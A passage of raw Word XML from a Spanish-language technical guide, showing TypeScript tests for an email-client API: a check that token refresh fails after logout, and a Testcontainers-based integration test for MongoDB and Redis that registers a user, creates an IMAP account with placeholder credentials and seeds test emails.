        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'set-cookie'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">as</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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> logoutRes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'/api/v1/auth/logout'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> setCookie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(logoutRes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">statusCode</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200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Intentar refresh después de logout</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> refreshRes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'/api/v1/auth/refresh'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> setCookie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(refreshRes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">statusCode</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401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05"/>
    <w:bookmarkStart w:id="206" w:name="testcontainers-para-mongodb-y-redis"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.2.2 Testcontainers para MongoDB y Redis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Testcontainers proporciona instancias reales de MongoDB y Redis en contenedores Docker durante los tests, eliminando las limitaciones de mongodb-memory-server con respecto a transacciones y change streams</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[301]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[267]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/routes/__tests__/emails.integration.spec.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> beforeAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> afterAll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 setupTestEnv } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../../../test/setup'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { User } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../../models/User'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { Email } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../../models/Email'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'mongoose'</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FastifyInstance } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'fastify'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">describe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Emails API Integration'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app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> FastifyInstance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> authToken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let</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let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> accountId</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beforeAll</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env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setupTestEnv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    app </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Crear usuario y autenticar</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> regRes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'/api/v1/auth/register'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'emailtest'</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'SecurePass123!'</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regBody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(regRes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    authToken </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> regBody</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accessToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    userId </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> regBody</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Crear cuenta de correo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> accountRes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'/api/v1/accounts'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { 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authToken</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payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'test@example.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        provider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'imap'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        imapHost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'imap.example.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        imapPort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">993</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'app-password'</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Test Account'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accountId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(accountRes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Seed de emails de prueba</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> folderId </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ObjectId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Email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">insertMany</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>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 length</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(_</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userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
